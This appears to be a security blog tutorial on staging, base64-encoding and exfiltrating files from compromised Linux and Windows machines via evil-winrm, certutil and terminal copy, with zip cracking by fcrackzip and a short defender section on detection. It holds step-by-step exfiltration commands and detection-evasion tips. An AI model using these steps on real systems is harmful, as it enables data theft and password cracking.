Data Exfiltration with Base64

A well defended network and properly trained security professional has many opportunities of detecting and stopping malicious actors. Each layer of activity found in the Mitre ATT&CK Matrix is a chance for the malicious actor to trip an alarm. A malicious cyber attack only needs to be detected and stopped in one of the stages to protect your company from the dreaded data spillage report.

Att&ck Matrix

The MITRE ATT&CK Matrix includes the following: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Ex-filtration. This gives us defenders many shots at getting the correct network visibility and alarms in place to take action in an automated way.

Exfiltration Technique

In this scenario we have compromised the target machine and located confidential files we are interested in exfiltrating from the company.

Linux

kali@targetmachine:~/Desktop/secretstuff$ ls
secretfile1.txt  secretfile2.txt  secretfiles.zip  secretplans.pdf

First I just created a directory called “allsecrets” then moved all the to the same directory. Copy would be more discreet, but check the current storage usage of the compromised machine before duplicating any files or folders.

kali@targetmachine:~/Desktop/secretstuff$ mkdir allsecrets
kali@targetmachine:~/Desktop/secretstuff$ mv * allsecrets
mv: cannot move 'allsecrets' to a subdirectory of itself, 'allsecrets/allsecrets'
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets

Next lets zip the contents in the new folder with a strong password.

kali@targetmachine:~/Desktop/secretstuff$ zip -e -r allthesecrets.zip allsecrets
Enter password: 
Verify password: 
updating: allsecrets/ (stored 0%)
updating: allsecrets/secretplans.pdf (deflated 6%)
updating: allsecrets/secretfiles.zip (stored 0%)
updating: allsecrets/secretfile2.txt (stored 0%)
updating: allsecrets/secretfile1.txt (stored 0%)
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets  allthesecrets.zip

Now we can output the entire .zip as base64 encoded string and output to file called “encodedstring.txt”.

kali@targetmachine:~/Desktop/secretstuff$ cat allthesecrets.zip | base64 > encodedstring.txt
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets  allthesecrets.zip  encodedstring.txt
kali@targetmachine:~/Desktop/secretstuff$ tail encodedstring.txt
uKe9CmqPfr1XAdJHi1BLBwh0L44FIAAAABQAAABQSwECHgMKAAAAAABppu5QAAAAAAAAAAAAAAAA
CwAYAAAAAAAAABAA7UEAAAAAYWxsc2VjcmV0cy9VVAUAAwVTDl91eAsAAQToAwAABOgDAABQSwEC
HgMUAAkACAAEou5QIVXFcczGGwAMfx0AGgAYAAAAAAAAAAAApIFFAAAAYWxsc2VjcmV0cy9zZWNy
ZXRwbGFucy5wZGZVVAUAA8hKDl91eAsAAQToAwAABOgDAABQSwECHgMKAAkAAAC1oO5Q6ih9tzMC
AAAnAgAAGgAYAAAAAAAAAAAApIF1xxsAYWxsc2VjcmV0cy9zZWNyZXRmaWxlcy56aXBVVAUAA1VI
Dl91eAsAAQToAwAABOgDAABQSwECHgMKAAkAAACpoe5QemS5FyQAAAAYAAAAGgAYAAAAAAABAAAA
pIEMyhsAYWxsc2VjcmV0cy9zZWNyZXRmaWxlMi50eHRVVAUAAx1KDl91eAsAAQToAwAABOgDAABQ
SwECHgMKAAkAAACioe5QdC+OBSAAAAAUAAAAGgAYAAAAAAABAAAApIGUyhsAYWxsc2VjcmV0cy9z
ZWNyZXRmaWxlMS50eHRVVAUAAw9KDl91eAsAAQToAwAABOgDAABQSwUGAAAAAAUABQDRAQAAGMsb
AAAA

Windows

Here we are connected to the target machine using evil-winrm.

root@kali:/home/kali# evil-winrm -u someuser -p blahblah -i 192.168.1.78

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\someuser\Documents>

Files for exfiltration discovered.

*Evil-WinRM* PS C:\Users\someuser\Documents> dir


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/18/2020   6:57 PM             28 secretfile1.txt
-a----        7/18/2020   6:57 PM             28 secretfile2.pdf
-a----        7/18/2020   6:58 PM             28 secretfile3.zip

Make the directory named “allthesecrets” and move all the files inside.

*Evil-WinRM* PS C:\Users\someuser\Documents> mkdir allthesecrets


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/18/2020   6:59 PM                allthesecrets


*Evil-WinRM* PS C:\Users\melanie\Documents> mv secret* ./allthesecrets

Compress the new directory.

*Evil-WinRM* PS C:\Users\someuser\Documents> Compress-Archive -LiteralPath allthesecrets -DestinationPath ./allsecrets.zip
*Evil-WinRM* PS C:\Users\someuser\Documents> dir


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/18/2020   6:59 PM                allthesecrets
-a----        7/18/2020   7:04 PM            505 allsecrets.zip

Using certutil we can encode the .zip with base64 and output the encoded data to “allsecrets.temp”.

*Evil-WinRM* PS C:\Users\someuser\Documents> certutil -encode allsecrets.zip allsecrets.temp
Input Length = 505
Output Length = 754
CertUtil: -encode command completed successfully.

Showing raw encoding.

*Evil-WinRM* PS C:\Users\someuser\Documents> type allsecrets.temp
-----BEGIN CERTIFICATE-----
UEsDBBQAAAAIADSX8lAqnxOzGwAAABwAAAAdAAAAYWxsdGhlc2VjcmV0c1xzZWNy
ZXRmaWxlMS50eHT7/6+YIZUhmaEISJYwpDFkMuQAWYYMvAxcDABQSwMEFAAAAAgA
PZfyUITthzUbAAAAHAAAAB0AAABhbGx0aGVzZWNyZXRzXHNlY3JldGZpbGUyLnBk
Zvv/r5ghlSGZoQhIljCkMWQy5ABZRgy8DFwMAFBLAwQUAAAACABSl/JQIT7b/hsA
AAAcAAAAHQAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTMuemlw+/+vmCGVIZmh
CEiWMKQxZDLkAFnGDLwMXAwAUEsBAhQAFAAAAAgANJfyUCqfE7MbAAAAHAAAAB0A
AAAAAAAAAAAAAAAAAAAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTEudHh0UEsB
AhQAFAAAAAgAPZfyUITthzUbAAAAHAAAAB0AAAAAAAAAAAAAAAAAVgAAAGFsbHRo
ZXNlY3JldHNcc2VjcmV0ZmlsZTIucGRmUEsBAhQAFAAAAAgAUpfyUCE+2/4bAAAA
HAAAAB0AAAAAAAAAAAAAAAAArAAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTMu
emlwUEsFBgAAAAADAAMA4QAAAAIBAAAAAA==
-----END CERTIFICATE-----

Removed first and last line of encoded data to allow decode within our attacking machine.

kali@kali:~/Documents/trenchesofit$ cat copiedb64.txt 
UEsDBBQAAAAIADSX8lAqnxOzGwAAABwAAAAdAAAAYWxsdGhlc2VjcmV0c1xzZWNy
ZXRmaWxlMS50eHT7/6+YIZUhmaEISJYwpDFkMuQAWYYMvAxcDABQSwMEFAAAAAgA
PZfyUITthzUbAAAAHAAAAB0AAABhbGx0aGVzZWNyZXRzXHNlY3JldGZpbGUyLnBk
Zvv/r5ghlSGZoQhIljCkMWQy5ABZRgy8DFwMAFBLAwQUAAAACABSl/JQIT7b/hsA
AAAcAAAAHQAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTMuemlw+/+vmCGVIZmh
CEiWMKQxZDLkAFnGDLwMXAwAUEsBAhQAFAAAAAgANJfyUCqfE7MbAAAAHAAAAB0A
AAAAAAAAAAAAAAAAAAAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTEudHh0UEsB
AhQAFAAAAAgAPZfyUITthzUbAAAAHAAAAB0AAAAAAAAAAAAAAAAAVgAAAGFsbHRo
ZXNlY3JldHNcc2VjcmV0ZmlsZTIucGRmUEsBAhQAFAAAAAgAUpfyUCE+2/4bAAAA
HAAAAB0AAAAAAAAAAAAAAAAArAAAAGFsbHRoZXNlY3JldHNcc2VjcmV0ZmlsZTMu
emlwUEsFBgAAAAADAAMA4QAAAAIBAAAAAA==

Windows & Linux

Now we can simply cat the contents to the terminal and copy the string from the file and decode on a local machine. Once the base64 content had been copied to the local machine, I had to do some minor format fixes with the first command. This is because we are copying directly from the terminal which will help minimize detection, but in turn will grab any new lines, returns, and spaces as well.

kali@kali:~$ echo $(cat copiedbase64.txt) > Output.txt | cat Output.txt | sed 's/ //g' > finaloutput.txt
kali@kali:~/Documents/trenchesofit$ cat copiedb64.txt | base64 --decode > allthesecrets.zip

Unzip the file with the password given on the target machine.

kali@kali:~$ unzip allthesecrets.zip 
Archive:  allthesecrets.zip
   creating: allsecrets/
[allthesecrets.zip] allsecrets/secretplans.pdf password: 
  inflating: allsecrets/secretplans.pdf  
 extracting: allsecrets/secretfiles.zip  
 extracting: allsecrets/secretfile2.txt  
 extracting: allsecrets/secretfile1.txt

There we go! Now we have the secret documents secured on the attacking machine. From here we can continue to analyze protected files. As we can see we pulled a password protected zip.

kali@kali:~/allsecrets$ unzip secretfiles.zip
Archive:  secretfiles.zip
[secretfiles.zip] file1.txt password:

We can run a quick fcrackzip on the password protected zip.

kali@kali:~/allsecrets$ fcrackzip -D -p /home/kali/tools/rockyou.txt secretfiles.zip
possible pw found: test ()
kali@kali:~/allsecrets$ unzip secretfiles.zip 
Archive:  secretfiles.zip
[secretfiles.zip] file1.txt password: 
 extracting: file1.txt               
 extracting: file2.txt               
 extracting: this.txt

Attackers Perspective

So from the attackers perspective, watch for triggers of anomalous behavior such as moving multiple key files. Like I said copying may be an option if the valuable files are small enough not to cause hard drive anomalies or storage issues. This exfiltration method is just “living off the land” and most defenders are not alerting on base64 usage.

Defenders Perspective

From a defenders perspective we have a couple of opportunities to catch this activity with the most obvious being the initial connection to the machine. Others would be using integrity monitoring on key files within the servers that would trigger an alert if changes are made to specific directories or files that you know should only be changed on a schedule or through the companies change process. The other detection point would be alerting on the use of base64 in the cli. This may not work for environments, but it’s up to the security professionals to recognize what deviates from normal activity within an environment and alert on that behavior.

Data exfiltration is defenders last chance at stopping an adversary before data spillage occurs. Ensure proper controls are in place to detect similar exfiltration methods so you are not one of the companies having to publish that data breach report.

Feel free to reach out with any questions or comments, and until next time, stays safe in the Trenches of IT!

Leave a Reply